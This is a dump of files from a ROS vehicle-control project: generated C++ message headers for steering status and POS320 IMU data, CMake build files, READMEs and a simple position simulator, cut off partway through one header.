"path": "/devel/share/gennodejs/ros/zfmsg/msg/_index.js",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\n\"use strict\";\n\nlet ThrottleGearStatus = require('./ThrottleGearStatus.js');\nlet BreakStatus = require('./BreakStatus.js');\nlet MotionCmd = require('./MotionCmd.js');\nlet CanInfo = require('./CanInfo.js');\nlet CanInfoAW = require('./CanInfoAW.js');\nlet SteerStatus = require('./SteerStatus.js');\n\nmodule.exports = {\n ThrottleGearStatus: ThrottleGearStatus,\n BreakStatus: BreakStatus,\n MotionCmd: MotionCmd,\n CanInfo: CanInfo,\n CanInfoAW: CanInfoAW,\n SteerStatus: SteerStatus,\n};\n"
},
{
"alpha_fraction": 0.6490867137908936,
"alphanum_fraction": 0.6641368865966797,
"avg_line_length": 25.99305534362793,
"blob_id": "d0e54c2e32d902c8436211086f2fa5143148868b",
"content_id": "a0ab5b856977aaa279c8b71cb33777790849662b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7774,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 288,
"path": "/devel/include/zfmsg/SteerStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/SteerStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_STEERSTATUS_H\n#define ZFMSG_MESSAGE_STEERSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct SteerStatus_\n{\n typedef SteerStatus_<ContainerAllocator> Type;\n\n SteerStatus_()\n : header()\n , ts(0)\n , angle(0.0)\n , speed(0.0)\n , controlMode(0)\n , targetAngle(0.0)\n , targetSpeed(0.0)\n , torque(0.0)\n , motorCurrent(0.0)\n , errorCode(0) {\n }\n SteerStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , angle(0.0)\n , speed(0.0)\n , controlMode(0)\n , targetAngle(0.0)\n , targetSpeed(0.0)\n , torque(0.0)\n , motorCurrent(0.0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef float _angle_type;\n _angle_type angle;\n\n typedef float _speed_type;\n _speed_type speed;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _targetAngle_type;\n _targetAngle_type targetAngle;\n\n typedef float _targetSpeed_type;\n _targetSpeed_type targetSpeed;\n\n typedef float _torque_type;\n _torque_type torque;\n\n typedef float _motorCurrent_type;\n _motorCurrent_type motorCurrent;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::SteerStatus_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::SteerStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct SteerStatus_\n\ntypedef ::zfmsg::SteerStatus_<std::allocator<void> > SteerStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::SteerStatus > SteerStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::SteerStatus const> SteerStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::SteerStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::SteerStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::SteerStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::SteerStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"09559d07e1ca45c09200d89a55db2635\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x09559d07e1ca45c0ULL;\n static const uint64_t static_value2 = 0x9200d89a55db2635ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/SteerStatus\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nfloat32 angle\\n\\\nfloat32 speed\\n\\\nuint8 controlMode\\n\\\nfloat32 targetAngle\\n\\\nfloat32 targetSpeed\\n\\\nfloat32 torque\\n\\\nfloat32 motorCurrent\\n\\\nuint8 errorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::SteerStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::SteerStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.angle);\n stream.next(m.speed);\n stream.next(m.controlMode);\n stream.next(m.targetAngle);\n stream.next(m.targetSpeed);\n stream.next(m.torque);\n stream.next(m.motorCurrent);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct SteerStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::SteerStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::SteerStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"angle: \";\n Printer<float>::stream(s, indent + \" \", v.angle);\n s << indent << \"speed: \";\n Printer<float>::stream(s, indent + \" \", v.speed);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"targetAngle: \";\n Printer<float>::stream(s, indent + \" \", v.targetAngle);\n s << indent << \"targetSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetSpeed);\n s << indent << \"torque: \";\n Printer<float>::stream(s, indent + \" \", v.torque);\n s << indent << \"motorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.motorCurrent);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_STEERSTATUS_H\n"
},
{
"alpha_fraction": 0.7321428656578064,
"alphanum_fraction": 0.7541208863258362,
"avg_line_length": 65.18181610107422,
"blob_id": "80130ad8cf40866157c3745c2471ecf906a5d3e4",
"content_id": "5f9be65a82ef5a657c83f0a74aa55389e31bd501",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 11,
"path": "/build/zf_msgs/cmake/zf_msgs-genmsg-context.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.context.in\n\nmessages_str = \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\nservices_str = \"\"\npkg_name = \"zf_msgs\"\ndependencies_str = \"std_msgs;geometry_msgs\"\nlangs = \"gencpp;geneus;genlisp;gennodejs;genpy\"\ndep_include_paths_str = \"zf_msgs;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg\"\nPYTHON_EXECUTABLE = \"/usr/bin/python\"\npackage_has_static_sources = '' == 'TRUE'\ngenmsg_check_deps_script = \"/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py\"\n"
},
{
"alpha_fraction": 0.7745097875595093,
"alphanum_fraction": 0.7941176295280457,
"avg_line_length": 50,
"blob_id": "5147971becb14c479f7a509d9107fe372bd08906",
"content_id": "d2644b46e256f3961f80f1fec343330ac0bf8d6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 4,
"path": "/devel/share/zf_msgs/cmake/zf_msgs-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(zf_msgs_MSG_INCLUDE_DIRS \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\")\nset(zf_msgs_MSG_DEPENDENCIES std_msgs;geometry_msgs)\n"
},
{
"alpha_fraction": 0.7411764860153198,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 41,
"blob_id": "4c805fd73fb504197b17acec6d398aaa33d02342",
"content_id": "d91222ddfa2d09d00b77a80e812e58df3e1ed7c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 2,
"path": "/src/zf_msgs/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\npos320.msg for imu of POS320\npose2dArray.msg for waypoints on car-perspective plane\n"
},
{
"alpha_fraction": 0.7401130199432373,
"alphanum_fraction": 0.7796609997749329,
"avg_line_length": 34.400001525878906,
"blob_id": "fd8f9434e3dee3d7cd6e5cd51e83114390ebbb07",
"content_id": "c03579b3ca84931177fb8a74cdb59ff42be78cb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 10,
"path": "/build/pos320/CMakeFiles/driver.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/driver.dir/src/driver.cpp.o\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/pos320/driver.pdb\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/pos320/driver\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/driver.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7841823101043701,
"alphanum_fraction": 0.788203775882721,
"avg_line_length": 28.84000015258789,
"blob_id": "e0f38889162334167bde9a473032db3246d4a54b",
"content_id": "1a943e228e51488623d88d851f4d38c80205f691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 25,
"path": "/src/steer/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(steer)\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs nav_msgs geometry_msgs genmsg zf_msgs)\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs geometry_msgs zf_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(pure_pursuit src/pure_pursuit.cpp)\ntarget_link_libraries(pure_pursuit ${catkin_LIBRARIES})\nadd_dependencies(pure_pursuit steer_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
{
"alpha_fraction": 0.5931624174118042,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.5,
"blob_id": "1af7f9447c5dfbc9e5980ed0f985908e543b200a",
"content_id": "1cdfc2a61f5ffc4757832b4c05656fd2a2a4d06d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 60,
"path": "/src/pos320/src/simulator.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n\n#include \"zf_msgs/pos320.h\"\n\n#include <iostream>\n#include <sstream>\n\n#include <deque>\n#include <boost/bind.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/thread.hpp>\n#include <boost/endian/arithmetic.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/optional.hpp>\n\n\nusing namespace boost::endian;\n///using namespace Eigen;\n\nstruct Pos320Struct {\n little_uint8_t length;\n little_uint8_t mode;\n little_int16_t time1;\n little_int32_t time2;\n little_uint8_t num;\n};\n\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"simulator\");\n\n ros::NodeHandle n;\n\n ros::Publisher pos320_pub = n.advertise<zf_msgs::pos320>(\"pos320_pose\", 1000);\n\n /// relative to frequency of pos320\n ros::Rate loop_rate(30);\n\n zf_msgs::pos320 pos320_data;\n\n int count = 0;\n while (ros::ok())\n {\n pos320_data.lat = 39.864323;\n pos320_data.lon = 116.179732;\n pos320_data.v_n = 0.8;\n pos320_data.v_e = 0.3;\n pos320_data.v_earth= 0.01;\n pos320_pub.publish(pos320_data);\n ros::spinOnce();\n\n loop_rate.sleep();\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6342412233352661,
"alphanum_fraction": 0.7159532904624939,
"avg_line_length": 22.363636016845703,
"blob_id": "e3ea3c9aa88c2e354f8e5a1a6f047d19d0b7c7f7",
"content_id": "e033f4e45feeadf793321ece8e1f79dfc8816166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 11,
"path": "/src/pos320/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "driver of POS320 imu, read from it and pub\n\nnode name is : read_pos320\n\npub topic: pos320_pose, content type :zf_msgs::pos320\n\n\nlive arguments \n serial port device , default is \"/dev/ttyUSB0\"\n loop_rate, default is 30\n baud_rate, default is 115200\n"
},
{
"alpha_fraction": 0.7374045848846436,
"alphanum_fraction": 0.743511438369751,
"avg_line_length": 40,
"blob_id": "6dd2b332d24ac8eaa4f852c92da8050b99aa887b",
"content_id": "ea1caf836086315807cc8464e41b852efc8ec379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 16,
"path": "/build/zfmsg/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"zfmsg\")\nset(zfmsg_VERSION \"0.0.0\")\nset(zfmsg_MAINTAINER \"an <[email protected]>\")\nset(zfmsg_PACKAGE_FORMAT \"2\")\nset(zfmsg_BUILD_DEPENDS \"roscpp\" \"std_msgs\" \"message_generation\")\nset(zfmsg_BUILD_EXPORT_DEPENDS \"roscpp\" \"std_msg\" \"message_generation\")\nset(zfmsg_BUILDTOOL_DEPENDS \"catkin\")\nset(zfmsg_BUILDTOOL_EXPORT_DEPENDS )\nset(zfmsg_EXEC_DEPENDS \"roscpp\" \"std_msgs\" \"message_runtime\")\nset(zfmsg_RUN_DEPENDS \"roscpp\" \"std_msgs\" \"message_runtime\" \"std_msg\" \"message_generation\")\nset(zfmsg_TEST_DEPENDS )\nset(zfmsg_DOC_DEPENDS )\nset(zfmsg_URL_WEBSITE \"\")\nset(zfmsg_URL_BUGTRACKER \"\")\nset(zfmsg_URL_REPOSITORY \"\")\nset(zfmsg_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.5828320384025574,
"alphanum_fraction": 0.6155829429626465,
"avg_line_length": 24.297101974487305,
"blob_id": "b95740df8868cd7979006e81a7170a510ebb58e3",
"content_id": "b157aa97716dab0e2ea8a849517cb65f13cc58e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 10473,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 414,
"path": "/devel/include/zf_msgs/pos320.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zf_msgs/pos320.msg\n// DO NOT EDIT!\n\n\n#ifndef ZF_MSGS_MESSAGE_POS320_H\n#define ZF_MSGS_MESSAGE_POS320_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zf_msgs\n{\ntemplate <class ContainerAllocator>\nstruct pos320_\n{\n typedef pos320_<ContainerAllocator> Type;\n\n pos320_()\n : header()\n , length(0)\n , mode(0)\n , time1(0)\n , time2(0)\n , num(0)\n , lat(0.0)\n , lon(0.0)\n , height(0.0)\n , v_n(0.0)\n , v_e(0.0)\n , v_earth(0.0)\n , roll(0.0)\n , pitch(0.0)\n , head(0.0)\n , a_n(0.0)\n , a_e(0.0)\n , a_earth(0.0)\n , v_roll(0.0)\n , v_pitch(0.0)\n , v_head(0.0)\n , status1(0)\n , status2(0)\n , checksum(0) {\n }\n pos320_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , length(0)\n , mode(0)\n , time1(0)\n , time2(0)\n , num(0)\n , lat(0.0)\n , lon(0.0)\n , height(0.0)\n , v_n(0.0)\n , v_e(0.0)\n , v_earth(0.0)\n , roll(0.0)\n , pitch(0.0)\n , head(0.0)\n , a_n(0.0)\n , a_e(0.0)\n , a_earth(0.0)\n , v_roll(0.0)\n , v_pitch(0.0)\n , v_head(0.0)\n , status1(0)\n , status2(0)\n , checksum(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef uint8_t _length_type;\n _length_type length;\n\n typedef uint8_t _mode_type;\n _mode_type mode;\n\n typedef int16_t _time1_type;\n _time1_type time1;\n\n typedef int32_t _time2_type;\n _time2_type time2;\n\n typedef uint8_t _num_type;\n _num_type num;\n\n typedef double _lat_type;\n _lat_type lat;\n\n typedef double _lon_type;\n _lon_type lon;\n\n typedef double _height_type;\n _height_type height;\n\n typedef double _v_n_type;\n _v_n_type v_n;\n\n typedef double _v_e_type;\n _v_e_type v_e;\n\n typedef double _v_earth_type;\n _v_earth_type v_earth;\n\n typedef double _roll_type;\n _roll_type roll;\n\n typedef double _pitch_type;\n _pitch_type pitch;\n\n typedef double _head_type;\n _head_type head;\n\n typedef double _a_n_type;\n _a_n_type a_n;\n\n typedef double _a_e_type;\n _a_e_type a_e;\n\n typedef double _a_earth_type;\n _a_earth_type a_earth;\n\n typedef double _v_roll_type;\n _v_roll_type v_roll;\n\n typedef double _v_pitch_type;\n _v_pitch_type v_pitch;\n\n typedef double _v_head_type;\n _v_head_type v_head;\n\n typedef uint8_t _status1_type;\n _status1_type status1;\n\n typedef uint8_t _status2_type;\n _status2_type status2;\n\n typedef uint8_t _checksum_type;\n _checksum_type checksum;\n\n\n\n\n\n typedef boost::shared_ptr< ::zf_msgs::pos320_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zf_msgs::pos320_<ContainerAllocator> const> ConstPtr;\n\n}; // struct pos320_\n\ntypedef ::zf_msgs::pos320_<std::allocator<void> > pos320;\n\ntypedef boost::shared_ptr< ::zf_msgs::pos320 > pos320Ptr;\ntypedef boost::shared_ptr< ::zf_msgs::pos320 const> pos320ConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zf_msgs::pos320_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zf_msgs::pos320_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zf_msgs\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'geometry_msgs': ['/opt/ros/kinetic/share/geometry_msgs/cmake/../msg'], 'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zf_msgs': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zf_msgs::pos320_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zf_msgs::pos320_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zf_msgs::pos320_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zf_msgs::pos320_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zf_msgs::pos320_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zf_msgs::pos320_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"90a0b5614d459b65b16442e42c81a2f7\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x90a0b5614d459b65ULL;\n static const uint64_t static_value2 = 0xb16442e42c81a2f7ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zf_msgs/pos320\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"Header header\\n\\\nuint8 length\\n\\\nuint8 mode\\n\\\nint16 time1\\n\\\nint32 time2\\n\\\nuint8 num\\n\\\nfloat64 lat\\n\\\nfloat64 lon\\n\\\nfloat64 height\\n\\\nfloat64 v_n\\n\\\nfloat64 v_e\\n\\\nfloat64 v_earth\\n\\\nfloat64 roll\\n\\\nfloat64 pitch\\n\\\nfloat64 head\\n\\\nfloat64 a_n\\n\\\nfloat64 a_e\\n\\\nfloat64 a_earth\\n\\\nfloat64 v_roll\\n\\\nfloat64 v_pitch\\n\\\nfloat64 v_head\\n\\\nuint8 status1\\n\\\nuint8 status2\\n\\\nuint8 checksum\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zf_msgs::pos320_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.length);\n stream.next(m.mode);\n stream.next(m.time1);\n stream.next(m.time2);\n stream.next(m.num);\n stream.next(m.lat);\n stream.next(m.lon);\n stream.next(m.height);\n stream.next(m.v_n);\n stream.next(m.v_e);\n stream.next(m.v_earth);\n stream.next(m.roll);\n stream.next(m.pitch);\n stream.next(m.head);\n stream.next(m.a_n);\n stream.next(m.a_e);\n stream.next(m.a_earth);\n stream.next(m.v_roll);\n stream.next(m.v_pitch);\n stream.next(m.v_head);\n stream.next(m.status1);\n stream.next(m.status2);\n stream.next(m.checksum);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct pos320_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zf_msgs::pos320_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"length: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.length);\n s << indent << \"mode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.mode);\n s << indent << \"time1: \";\n Printer<int16_t>::stream(s, indent + \" \", v.time1);\n s << indent << \"time2: \";\n Printer<int32_t>::stream(s, indent + \" \", v.time2);\n s << indent << \"num: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.num);\n s << indent << \"lat: \";\n Printer<double>::stream(s, indent + \" \", v.lat);\n s << indent << \"lon: \";\n Printer<double>::stream(s, indent + \" \", v.lon);\n s << indent << \"height: \";\n Printer<double>::stream(s, indent + \" \", v.height);\n s << indent << \"v_n: \";\n Printer<double>::stream(s, indent + \" \", v.v_n);\n s << indent << \"v_e: \";\n Printer<double>::stream(s, indent + \" \", v.v_e);\n s << indent << \"v_earth: \";\n Printer<double>::stream(s, indent + \" \", v.v_earth);\n s << indent << \"roll: \";\n Printer<double>::stream(s, indent + \" \", v.roll);\n s << indent << \"pitch: \";\n Printer<double>::stream(s, indent + \" \", v.pitch);\n s << indent << \"head: \";\n Printer<double>::stream(s, indent + \" \", v.head);\n s << indent << \"a_n: \";\n Printer<double>::stream(s, indent + \" \", v.a_n);\n s << indent << \"a_e: \";\n Printer<double>::stream(s, indent + \" \", v.a_e);\n s << indent << \"a_earth: \";\n 